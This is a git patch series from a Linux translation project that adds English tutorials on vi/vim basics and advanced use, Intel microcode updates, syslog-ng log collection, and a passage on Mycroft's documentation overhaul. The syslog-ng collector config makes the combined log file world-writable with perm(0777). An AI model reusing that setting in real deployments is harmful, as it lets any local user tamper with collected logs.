+[1]:/cdn-cgi/l/email-protection
+[2]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dash.png
+[3]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dash.png
+[4]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dashboard.png
+[5]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dashboard.png
From 7181a7b093ec826833cae1b3e95d770ce5ea0b7d Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:04:41 +0800
Subject: [PATCH 239/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Working=20with=20?=
=?UTF-8?q?VI=20editor=20:=20The=20Basics?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...511 Working with VI editor - The Basics.md | 138 ++++++++++++++++++
1 file changed, 138 insertions(+)
create mode 100644 sources/tech/20170511 Working with VI editor - The Basics.md
diff --git a/sources/tech/20170511 Working with VI editor - The Basics.md b/sources/tech/20170511 Working with VI editor - The Basics.md
new file mode 100644
index 0000000000..4056c3c9ec
--- /dev/null
+++ b/sources/tech/20170511 Working with VI editor - The Basics.md
@@ -0,0 +1,138 @@
+Working with VI editor : The Basics
+======
+VI editor is a powerful command-line-based text editor that was originally created for Unix but has since been ported to various Unix & Linux distributions. In Linux there exists another, advanced version of the VI editor called VIM (also known as VI IMproved). VIM adds functionality to the already powerful VI editor. Some of the added features are:
+
+ * Support for many more Linux distributions,
+
+ * Support for various coding languages like Python, C++, Perl etc. with features like code folding, code highlighting, etc.
+
+ * Can be used to edit files over network protocols like ssh and http,
+
+ * Support to edit files inside a compressed archive,
+
+ * Allows screen to split for editing multiple files.
+
+
+
+
+Now let's discuss the commands/options that we can use with VI/VIM. For the purposes of this tutorial, we are going to use VI as an example, but all of the commands shown for VI can be used with VIM as well. First, let's start with the two modes of the VI text editor.
+
+### Command Mode
+
+This mode lets us handle tasks like saving files, executing commands within vi, copy/cut/paste operations, and finding/replacing. When in Insert mode, we can press the Escape key to return to command mode.
+
+### Insert Mode
+
+It's where we insert text into the file. To get into insert mode, we press 'i' while in command mode.
+
+### Creating a file
+
+In order to create a file, use
+
+```
+ $ vi filename
+```
+
+Once the file is created & opened, we start out in command mode; to enter text into the file, we need to switch to insert mode, as described above.
+
+### Exit out of Vi
+
+To exit out of Vi from insert mode, we first press the 'Esc' key to return to command mode, & from here we can perform the following tasks to exit out of vi:
+
+ 1. Exit without saving the file - to exit out of vi from command mode without saving the file, type: `:q!`
+
+ 2. Save file & exit - To save a file & exit, type: `:wq`
+
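+Putting the create/edit/save steps above together, here is a minimal non-interactive sketch (not part of the original article); it assumes vim is installed and uses a hypothetical file named notes.txt:
+
+```
+# hedged sketch: open (or create) notes.txt, insert one line of text via
+# normal-mode 'i', then save and quit with :wq - all driven from the shell
+vim -c 'normal iHello from vi' -c 'wq' notes.txt
+```
+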
+Now let's discuss the commands/options that can be used in command mode.
+
+### Cursor movement
+
+Use the keys mentioned below to manipulate the cursor position
+
+ 1. **k** moves cursor one line up
+
+ 2. **j** moves cursor one line down
+
+ 3. **h** moves cursor one character position to the left
+
+ 4. **l** moves cursor one character position to the right
+
+
+
+
+ **Note:** If we want to move multiple lines up or down, or multiple characters left or right, we can prefix the key with a number: for example, 4k moves the cursor 4 lines up and 5j moves it 5 lines down.
+
+ 5. **0** moves cursor to the beginning of the line
+
+ 6. **$** moves cursor to the end of the line
+
+ 7. **nG** moves to the nth line of the file
+
+ 8. **G** moves to the last line of the file
+
+ 9. **{** moves a paragraph back
+
+ 10. **}** moves a paragraph forward
+
+
+
+
+There are several other options that can be used to manage the cursor movement but these should get the work done for you.
+
+### Editing files
+
+Now we will learn the options that can be used from command mode to switch into Insert mode for editing files:
+
+ 1. **i** Inserts text before the current cursor location
+
+ 2. **I** Inserts text at the beginning of the current line
+
+ 3. **a** Inserts text after the current cursor location
+
+ 4. **A** Inserts text at the end of the current line
+
+ 5. **o** Creates a new line for text entry below the cursor location
+
+ 6. **O** Creates a new line for text entry above the cursor location
+
+
+
+
+### Deleting file text
+
+All of these commands are executed from command mode, so if you are in Insert mode, exit back to command mode using the 'Esc' key.
+
+ 1. **dd** deletes the complete line under the cursor; a number can be added, e.g. 2dd deletes 2 lines starting from the cursor
+
+ 2. **d$** deletes from cursor position till end of the line
+
+ 3. **d^** deletes from cursor position till beginning of line
+
+ 4. **dw** deletes from cursor to next word
+
+
+### Copy & paste commands
+
+ 1. **yy** to yank or copy the current line. Can be used with a number to copy a number of lines
+
+ 2. **p** pastes the copied lines after the cursor position
+
+ 3. **P** pastes the copied lines before the cursor position
+
+
+
+
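+As an illustrative, hedged way to tie the copy, paste, and delete commands together, the same keystrokes can also be driven non-interactively from the shell. This sketch is not from the original article and assumes a hypothetical notes.txt with at least five lines:
+
+```
+# yank line 1 (1G yy), paste it below line 3 (3G p), delete line 5 (5G dd),
+# then save and quit
+vim -c 'normal 1Gyy3Gp5Gdd' -c 'wq' notes.txt
+```
+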
+These were some of the basic operations that we can use with the VI or VIM editor. In our future tutorials, we will learn to perform some advanced operations with the VI/VIM editor. If you have any queries or comments, please leave them in the comment box below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/working-vi-editor-basics/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
From a69162a58b8571b063ad48a95f7849b25eea4c83 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:10:16 +0800
Subject: [PATCH 240/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Working=20with=20?=
=?UTF-8?q?Vi/Vim=20Editor=20:=20Advanced=20concepts?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... with Vi-Vim Editor - Advanced concepts.md | 116 ++++++++++++++++++
1 file changed, 116 insertions(+)
create mode 100644 sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
diff --git a/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
new file mode 100644
index 0000000000..052069d66a
--- /dev/null
+++ b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
@@ -0,0 +1,116 @@
+Working with Vi/Vim Editor : Advanced concepts
+======
+Earlier we discussed some basics of the VI/VIM editor, but VI & VIM are both very powerful editors and there are many other functionalities that can be used with them. In this tutorial, we are going to learn some advanced uses of the VI/VIM editor.
+
+( **Recommended Read** : [Working with VI editor : The Basics ][1])
+
+## Opening multiple files with VI/VIM editor
+
+To open multiple files, the command is the same as for a single file; we just add the names of the other files as well.
+
+```
+ $ vi file1 file2 file3
+```
+
+Now to browse to next file, we can use
+
+```
+:n
+```
+
+or we can also use
+
+```
+:e filename
+```
+
+## Run external commands inside the editor
+
+We can run external Linux/Unix commands from inside the vi editor, i.e. without exiting the editor. To issue a command from the editor, go back to command mode if you are in insert mode, & use the BANG, i.e. '!', followed by the command that needs to be run. The syntax for running a command is:
+
+```
+:! command
+```
+
+An example for this would be
+
+```
+:! df -H
+```
+
+## Searching for a pattern
+
+To search for a word or pattern in the text file, we use the following two commands in command mode:
+
+ * command '/' searches for the pattern in the forward direction
+
+ * command '?' searches for the pattern in the backward direction
+
+
+Both of these commands are used for the same purpose, the only difference being the direction they search in. An example would be:
+
+ `/search_pattern` (searches forward; use this if you are at the beginning of the file)
+
+ `?search_pattern` (searches backward; use this if you are at the end of the file)
+
+## Searching & replacing a pattern
+
+We might need to search for & replace a word or a pattern in our text files. Rather than finding each occurrence of the word in the whole text file & replacing it by hand, we can issue a single command from command mode to replace the word automatically throughout the file (the leading '%' makes the substitution apply to every line; without it, only the current line is affected). The syntax for search & replace is:
+
+```
+:%s/pattern_to_be_found/new_pattern/g
+```
+
+Suppose we want to find the word "alpha" & replace it with the word "beta" everywhere in the file; the command would be
+
+```
+:%s/alpha/beta/g
+```
+
+If we only want to replace the first occurrence of the word "alpha" on the current line, then the command would be
+
+```
+:s/alpha/beta/
+```
+
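+A hedged, non-interactive sketch of the same substitution (not from the original article; `silent!` simply suppresses the error if the pattern is absent):
+
+```
+# replace every occurrence of alpha with beta in file.txt and save the result
+vim -c 'silent! %s/alpha/beta/g' -c 'wq' file.txt
+```
+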
+## Using Set commands
+
+We can also customize the behaviour and the look and feel of the vi/vim editor by using the set command. Here is a list of some options that can be used with the set command to modify the behaviour of the vi/vim editor:
+
+ `:set ic ` ignores case while searching
+
+ `:set smartcase ` makes the search case-sensitive when the pattern contains uppercase letters (used together with ic)
+
+ `:set nu` displays line numbers at the beginning of each line
+
+ `:set hlsearch ` highlights the matching words
+
+ `:set ro ` marks the buffer as read-only
+
+ `:set term ` prints the terminal type
+
+ `:set ai ` sets auto-indent
+
+ `:set noai ` unsets the auto-indent
+
+Some other commands to modify the vi editor are:
+
+ `:colorscheme ` it's used to change the color scheme of the editor (for the VIM editor only)
+
+ `:syntax on ` will turn on syntax highlighting for .xml, .html files etc. (for the VIM editor only)
+
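+A hedged example (not from the original article): to make any of these options permanent, they can be appended to ~/.vimrc, which vim reads at startup:
+
+```
+# append a few of the options discussed above to ~/.vimrc
+cat >> ~/.vimrc <<'EOF'
+set ignorecase
+set smartcase
+set number
+set hlsearch
+syntax on
+EOF
+```
+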
+This completes our tutorial; do mention your queries/questions or suggestions in the comment box below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/working-vivim-editor-advanced-concepts/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/working-vi-editor-basics/
From b620ffa479a8e2c4701d6f07d753354720cb4bf7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:16:21 +0800
Subject: [PATCH 241/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20instal?=
=?UTF-8?q?l/update=20Intel=20microcode=20firmware=20on=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...pdate Intel microcode firmware on Linux.md | 155 ++++++++++++++++++
1 file changed, 155 insertions(+)
create mode 100644 sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md
diff --git a/sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md b/sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md
new file mode 100644
index 0000000000..a43ddb27ce
--- /dev/null
+++ b/sources/tech/20180110 How to install-update Intel microcode firmware on Linux.md
@@ -0,0 +1,155 @@
+How to install/update Intel microcode firmware on Linux
+======
+
+
+I am a new Linux sysadmin. How do I install or update microcode firmware for Intel/AMD CPUs on Linux using the command line option?
+
+
+Microcode is nothing but CPU firmware provided by Intel or AMD. The Linux kernel can update the CPU's firmware without a BIOS update at boot time. The processor microcode is stored in RAM and the kernel updates the microcode during every boot. These microcode updates from Intel/AMD are needed to fix bugs or apply errata to avoid CPU bugs. This page shows how to install AMD or Intel microcode updates using a package manager or the processor microcode updates supplied by Intel on Linux.
+
+## How to find out current status of microcode
+
+
+Run the following command as root user:
+`# dmesg | grep microcode`
+Sample outputs:
+
+[![Verify microcode update on a CentOS RHEL Fedora Ubuntu Debian Linux][1]][1]
+
+Please note that it is entirely possible that there is no microcode update available for your CPU. In that case it will look as follows:
+```
+[ 0.952699] microcode: sig=0x306a9, pf=0x10, revision=0x1c
+[ 0.952773] microcode: Microcode Update Driver: v2.2.
+
+```
+
+## How to install Intel microcode firmware on Linux using a package manager
+
+A tool to transform and deploy CPU microcode updates for x86/amd64 comes with Linux. The procedure to install AMD or Intel microcode firmware on Linux is as follows:
+
+ 1. Open the terminal app
+ 2. Debian/Ubuntu Linux users type: **sudo apt install intel-microcode**
+ 3. CentOS/RHEL Linux users type: **sudo yum install microcode_ctl**
+
+
+
+The package names are as follows for popular Linux distros:
+
+ * microcode_ctl and linux-firmware - CentOS/RHEL microcode update package
+ * intel-microcode - Debian/Ubuntu and clones microcode update package for Intel CPUs
+ * amd64-microcode - Debian/Ubuntu and clones microcode firmware for AMD CPUs
+ * linux-firmware - Arch Linux microcode firmware for AMD CPUs (installed by default and no action is needed on your part)
+ * intel-ucode - Arch Linux microcode firmware for Intel CPUs
+ * microcode_ctl and ucode-intel - Suse/OpenSUSE Linux microcode update package
+
+
+
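+A hedged helper (not part of the original article) to confirm whether the box has an Intel or AMD CPU before picking one of the packages above:
+
+```
+# vendor_id shows GenuineIntel or AuthenticAMD
+grep -m1 'vendor_id' /proc/cpuinfo
+# lscpu also prints the CPU model name
+lscpu | grep -i 'model name'
+```
+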
+**Warning**: In some cases, a microcode update may cause boot issues, such as the server hanging or resetting automatically at boot time. The procedure worked for me, and I am an experienced sysadmin, but I take no responsibility for any hardware failures. Do it at your own risk.
+
+### Examples
+
+Type the following [apt command][2]/[apt-get command][3] on a Debian/Ubuntu Linux for Intel CPU:
+
+`$ sudo apt-get install intel-microcode`
+
+Sample outputs:
+
+[![How to install Intel microcode firmware Linux][4]][4]
+
+You [must reboot the box to activate the microcode][5] update:
+
+`$ sudo reboot`
+
+Verify it after reboot:
+
+`# dmesg | grep 'microcode'`
+
+Sample outputs:
+
+```
+[ 0.000000] microcode: microcode updated early to revision 0x1c, date = 2015-02-26
+[ 1.604672] microcode: sig=0x306a9, pf=0x10, revision=0x1c
+[ 1.604976] microcode: Microcode Update Driver: v2.01 , Peter Oruba
+
+```
+
+If you are using RHEL/CentOS try installing or updating the following two packages using [yum command][6]:
+
+```
+$ sudo yum install linux-firmware microcode_ctl
+$ sudo reboot
+$ sudo dmesg | grep 'microcode'
+```
+
+## How to update/install microcode downloaded from Intel site
+
+Only use the following method when recommended by your vendor; otherwise stick to the Linux packages described above. Most Linux distro maintainers ship microcode updates via the package manager. The package manager method is safer, as it has been tested by many users.
+
+### How to install Intel processor microcode blob for Linux (20180108 release)
+
+Ok, first visit the AMD or [Intel site][7] to grab the latest microcode firmware. In this example, I have a file named ~/Downloads/microcode-20180108.tgz (don't forget to verify its checksum) that is supposed to help with Meltdown/Spectre. First extract it using the tar command:
+```
+$ mkdir firmware
+$ cd firmware
+$ tar xvf ~/Downloads/microcode-20180108.tgz
+$ ls -l
+```
+
+Sample outputs:
+
+```
+drwxr-xr-x 2 vivek vivek 4096 Jan 8 12:41 intel-ucode
+-rw-r--r-- 1 vivek vivek 4847056 Jan 8 12:39 microcode.dat
+-rw-r--r-- 1 vivek vivek 1907 Jan 9 07:03 releasenote
+
+```
+
+Make sure /sys/devices/system/cpu/microcode/reload exists:
+
+`$ ls -l /sys/devices/system/cpu/microcode/reload`
+
+You must copy all files from intel-ucode to /lib/firmware/intel-ucode/ using the [cp command][8]:
+
+`$ sudo cp -v intel-ucode/* /lib/firmware/intel-ucode/`
+
+With that, you have copied the intel-ucode files into /lib/firmware/intel-ucode/. Now write 1 to the reload interface to reload the microcode files:
+
+`# echo 1 > /sys/devices/system/cpu/microcode/reload`
+
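+The `#` prompt above means the command is run as root. If you are working from a regular user account, a hedged equivalent (not in the original article) is to pipe through sudo tee, since a plain `sudo echo 1 > ...` would fail because the redirection happens before privileges are raised:
+
+```
+# write 1 to the reload interface with root privileges
+echo 1 | sudo tee /sys/devices/system/cpu/microcode/reload
+```
+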
+Update the existing initramfs so that the new microcode gets loaded by the kernel at the next boot:
+
+```
+$ sudo update-initramfs -u
+$ sudo reboot
+```
+Verify that the microcode got updated on boot or reloaded by the echo command:
+`# dmesg | grep microcode`
+
+That is all. You have just updated firmware for your Intel CPU.
+
+## About the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][9], [Facebook][10], [Google+][11].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/install-update-intel-microcode-firmware-linux/
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/media/new/faq/2018/01/Verify-microcode-update-on-a-CentOS-RHEL-Fedora-Ubuntu-Debian-Linux.jpg
+[2]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[4]:https://www.cyberciti.biz/media/new/faq/2018/01/How-to-install-Intel-microcode-firmware-Linux.jpg
+[5]:https://www.cyberciti.biz/faq/howto-reboot-linux/
+[6]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[7]:https://downloadcenter.intel.com/download/27431/Linux-Processor-Microcode-Data-File
+[8]:https://www.cyberciti.biz/faq/cp-copy-command-in-unix-examples/ (See Linux/Unix cp command examples for more info)
+[9]:https://twitter.com/nixcraft
+[10]:https://facebook.com/nixcraft
+[11]:https://plus.google.com/+CybercitiBiz
From eeccdf793536b15f4b54af9664882dfd2d32f562 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 16:20:48 +0800
Subject: [PATCH 242/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use=20?=
=?UTF-8?q?syslog-ng=20to=20collect=20logs=20from=20remote=20Linux=20machi?=
=?UTF-8?q?nes?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...collect logs from remote Linux machines.md | 111 ++++++++++++++++++
1 file changed, 111 insertions(+)
create mode 100644 sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md
diff --git a/sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md b/sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md
new file mode 100644
index 0000000000..ba1312b426
--- /dev/null
+++ b/sources/tech/20180109 How to use syslog-ng to collect logs from remote Linux machines.md
@@ -0,0 +1,111 @@
+How to use syslog-ng to collect logs from remote Linux machines
+======
+![linuxhero.jpg][1]
+
+Image: Jack Wallen
+
+Let's say your data center is filled with Linux servers and you need to administer them all. Part of that administration job is viewing log files. But if you're looking at numerous machines, that means logging into each machine individually, reading log files, and then moving onto the next. Depending upon how many machines you have, that can take a large chunk of time from your day.
+
+Or, you could set up a single Linux machine to collect those logs. That would make your day considerably more efficient. To do this, you could opt for a number of different systems, one of which is syslog-ng.
+
+The problem with syslog-ng is that the documentation isn't the easiest to comb through. However, I've taken care of that and am going to lay out the installation and configuration in such a way that you can have syslog-ng up and running in no time. I'll be demonstrating on Ubuntu Server 16.04 on a two system setup:
+
+ * UBUNTUSERVERVM at IP address 192.168.1.118 will serve as log collector
+ * UBUNTUSERVERVM2 will serve as a client, sending log files to the collector
+
+
+
+Let's install and configure.
+
+## Installation
+
+The installation is simple. I'll be installing from the standard repositories, in order to make this as easy as possible. To do this, open up a terminal window and issue the command:
+```
+sudo apt install syslog-ng
+```
+
+You must issue the above command on both collector and client. Once that's installed, you're ready to configure.
+
+## Configuration for the collector
+
+We'll start with the configuration of the log collector. The configuration file is /etc/syslog-ng/syslog-ng.conf. Out of the box, syslog-ng includes a configuration file. We're not going to use that. Let's rename the default config file with the command sudo mv /etc/syslog-ng/syslog-ng.conf /etc/syslog-ng/syslog-ng.conf.BAK. Now create a new configuration file with the command sudo nano /etc/syslog-ng/syslog-ng.conf. In that file add the following:
+```
+@version: 3.5
+@include "scl.conf"
+@include "`scl-root`/system/tty10.conf"
+ options {
+ time-reap(30);
+ mark-freq(10);
+ keep-hostname(yes);
+ };
+ source s_local { system(); internal(); };
+ source s_network {
+ syslog(transport(tcp) port(514));
+ };
+ destination d_local {
+ file("/var/log/syslog-ng/messages_${HOST}"); };
+ destination d_logs {
+ file(
+ "/var/log/syslog-ng/logs.txt"
+ owner("root")
+ group("root")
+ perm(0777)
+ ); };
+ log { source(s_local); source(s_network); destination(d_logs); };
+```
+
+Do note that we are working with port 514, so you'll need to make sure it is accessible on your network.
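+
+If the collector runs a firewall, that port has to be opened. A hedged example (not from the original article), assuming the default UFW firewall on Ubuntu:
+
+```
+# allow incoming syslog traffic from clients on TCP port 514
+sudo ufw allow 514/tcp
+```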
+
+Save and close the file. The above configuration will dump the desired log files (denoted with system() and internal()) into /var/log/syslog-ng/logs.txt. Because of this, you need to create the directory and file with the following commands:
+```
+sudo mkdir /var/log/syslog-ng
+sudo touch /var/log/syslog-ng/logs.txt
+```
+
+Start and enable syslog-ng with the commands:
+```
+sudo systemctl start syslog-ng
+sudo systemctl enable syslog-ng
+```
+
+## Configuration for the client
+
+We're going to do the very same thing on the client (moving the default configuration file and creating a new configuration file). Copy the following text into the new client configuration file:
+```
+@version: 3.5
+@include "scl.conf"
+@include "`scl-root`/system/tty10.conf"
+source s_local { system(); internal(); };
+destination d_syslog_tcp {
+ syslog("192.168.1.118" transport("tcp") port(514)); };
+log { source(s_local);destination(d_syslog_tcp); };
+```
+
+Note: Change the IP address to match the address of your collector server.
+
+Save and close that file. Start and enable syslog-ng in the same fashion you did on the collector.
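+
+A hedged way (not in the original article) to confirm the client is forwarding correctly is to generate a test entry with the logger command and then look for it on the collector:
+
+```
+# run on the client: send a test message through the local syslog
+logger "syslog-ng test from $(hostname)"
+```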
+
+## View the log files
+
+Head back to your collector and issue the command sudo tail -f /var/log/syslog-ng/logs.txt. You should see output that includes log entries for both collector and client ( **Figure A** ).
+
+ **Figure A**
+
+![Figure A][3]
+
+Congratulations, syslog-ng is working. You can now log into your collector to view logs from both the local machine and the remote client. If you have more Linux servers in your data center, walk through the process of installing syslog-ng and setting each of them up as a client to send their logs to the collector, so you no longer have to log into individual machines to view logs.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.techrepublic.com/article/how-to-use-syslog-ng-to-collect-logs-from-remote-linux-machines/
+
+作者:[Jack Wallen][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://tr1.cbsistatic.com/hub/i/r/2017/01/11/51204409-68e0-49b8-a637-01af26be85f6/resize/770x/688dfedad4ed30ec4baf548c2adb8cd4/linuxhero.jpg
+[3]:https://tr4.cbsistatic.com/hub/i/2018/01/09/6a24e5c0-6a29-46d3-8a66-bc72747b5beb/6f94d3e6c6c2121fab6223ed9d8c6aa6/syslognga.jpg
From 50c158f4957bdf87d57e93f4f0531822f39fd5b9 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:30:37 +0800
Subject: [PATCH 243/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20Mycroft=20u?=
=?UTF-8?q?sed=20WordPress=20and=20GitHub=20to=20improve=20its=20documenta?=
=?UTF-8?q?tion?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...and GitHub to improve its documentation.md | 116 ++++++++++++++++++
1 file changed, 116 insertions(+)
create mode 100644 sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
diff --git a/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md b/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
new file mode 100644
index 0000000000..9e35e0ede7
--- /dev/null
+++ b/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
@@ -0,0 +1,116 @@
+How Mycroft used WordPress and GitHub to improve its documentation
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/doc-dish-lead-2.png?itok=lPO6tqPd)
+
+Image credits : Photo by Unsplash; modified by Rikki Endsley. CC BY-SA 4.0
+
+Imagine you've just joined a new technology company, and one of the first tasks you're assigned is to improve and centralize the organization's developer-facing documentation. There's just one catch: That documentation exists in many different places, across several platforms, and differs markedly in accuracy, currency, and style.
+
+So how did we tackle this challenge?
+
+### Understanding the scope
+
+As with any project, we first needed to understand the scope and bounds of the problem we were trying to solve. What documentation was good? What was working? What wasn't? How much documentation was there? What format was it in? We needed to do a **documentation audit**. Luckily, [Aneta Šteflova][1] had recently [published an article on OpenSource.com][2] about this, and it provided excellent guidance.
+
+![mycroft doc audit][4]
+
+Mycroft documentation audit, showing source, topic, medium, currency, quality and audience
+
+Next, every piece of publicly facing documentation was assessed for the topic it covered, the medium it used, currency, and quality. A pattern quickly emerged that different platforms had major deficiencies, allowing us to take a data-driven approach to decommissioning our existing Jekyll-based sites. The audit also highlighted just how fragmented our documentation sources were--we had developer-facing documentation across no fewer than seven sites. Although search engines were finding this content just fine, the fragmentation made it difficult for developers and users of Mycroft--our primary audiences--to navigate the information they needed. Again, this data helped us make the decision to centralize our documentation onto one platform.
+
+### Choosing a central platform
+
+As an organization, we wanted to constrain the number of standalone platforms in use. Over time, maintenance and upkeep of multiple platforms and integration touchpoints becomes cumbersome for any organization, but this is exacerbated for a small startup.
+
+One of the other business drivers in platform choice was that we had two primary but very different audiences. On one hand, we had highly technical developers who we were expecting would push documentation to its limits--and who would want to contribute to technical documentation using their tools of choice--[Git][5], [GitHub][6], and [Markdown][7]. Our second audience--end users--would primarily consume technical documentation and would want to do so in an inviting, welcoming platform that was visually appealing and provided additional features such as the ability to identify reading time and to provide feedback. The ability to capture feedback was also a key requirement from our side as without feedback on the quality of the documentation, we would not have a solid basis to undertake continuous quality improvement.
+
+Would we be able to identify one platform that met all of these competing needs?
+
+We realised that two platforms covered all of our needs:
+
+ * [WordPress][8]: Our existing website is built on WordPress, and we have some reasonably robust WordPress skills in-house. The flexibility of WordPress also fulfilled our requirements for functionality like reading time and the ability to capture user feedback.
+ * [GitHub][9]: Almost [all of Mycroft.AI's source code is available on GitHub][10], and our development team uses this platform daily.
+
+
+
+But how could we marry the two?
+
+
+![](https://opensource.com/sites/default/files/images/life-uploads/wordpress-github-sync.png)
+
+### Integrating WordPress and GitHub with WordPress GitHub Sync
+
+Luckily, our COO, [Nate Tomasi][11], spotted a WordPress plugin that promised to integrate the two.
+
+This was put through its paces on our test website, and it passed with flying colors. It was easy to install, had a straightforward configuration, which just required an OAuth token and webhook with GitHub, and provided two-way integration between WordPress and GitHub.
+
+It did, however, have a dependency--on Markdown--which proved a little harder to implement. We trialed several Markdown plugins, but each had several quirks that interfered with the rendering of non-Markdown-based content. After several days of frustration, and even an attempt to custom-write a plugin for our needs, we stumbled across [Parsedown Party][12]. There was much partying! With WordPress GitHub Sync and Parsedown Party, we had integrated our two key platforms.
+
+Now it was time to make our content visually appealing and usable for our user audience.
+
+### Reading time and feedback
+
+To implement the reading time and feedback functionality, we built a new [page template for WordPress][13], and leveraged plugins within the page template.
+
+Knowing the estimated reading time of an article in advance has been [proven to increase engagement with content][14] and provides developers and users with the ability to decide whether to read the content now or bookmark it for later. We tested several WordPress plugins for reading time, but settled on [Reading Time WP][15] because it was highly configurable and could be easily embedded into WordPress page templates. Our decision to place Reading Time at the top of the content was designed to give the user the choice of whether to read now or save for later. With Reading Time in place, we then turned our attention to gathering user feedback and ratings for our documentation.
+
+![](https://opensource.com/sites/default/files/images/life-uploads/screenshot-from-2017-12-08-00-55-31.png)
+
+There are several rating and feedback plugins available for WordPress. We needed one that could be easily customized for several use cases, and that could aggregate or summarize ratings. After some experimentation, we settled on [Multi Rating Pro][16] because of its wide feature set, especially the ability to create a Review Ratings page in WordPress--i.e., a central page where staff can review ratings without having to be logged in to the WordPress backend. The only gap we ran into here was the ability to set the display order of rating options--but it will likely be added in a future release.
+
+The WordPress GitHub Integration plugin also gave us the ability to link back to the GitHub repository where the original Markdown content was held, inviting technical developers to contribute to improving our documentation.
+
+### Updating the existing documentation
+
+Now that the "container" for our new documentation had been developed, it was time to update the existing content. Because much of our documentation had grown organically over time, there were no style guidelines to shape how keywords and code were styled. This was tackled first, so that it could be applied to all content. [You can see our content style guidelines on GitHub.][17]
+
+As part of the update, we also ran several checks to ensure that the content was technically accurate, augmenting the existing documentation with several images for better readability.
+
+There were also a couple of additional tools that made creating internal links for documentation pieces easier. First, we installed the [WP Anchor Header][18] plugin. This plugin provided a small but important function: adding `id` attributes to each heading (`h1`, `h2`, and so on) element. This meant that internal anchors could be automatically generated on the command line from the Markdown content in GitHub using the [markdown-toc][19] library, then simply copied in to the WordPress content, where they would automatically link to the `id` attributes generated by WP Anchor Header.
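+
+As a hedged sketch of that command-line step (not from the original article), assuming the markdown-toc CLI is installed from npm:
+
+```
+# install the CLI once, then print a linked table of contents for a page
+npm install -g markdown-toc
+markdown-toc README.md
+```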
+
+Next, we imported the updated documentation into WordPress from GitHub, and made sure we had meaningful and easy-to-search on slugs, descriptions, and keywords--because what good is excellent documentation if no one can find it?! A final activity was implementing redirects so that people hitting the old documentation would be taken to the new version.
+
+### What next?
+
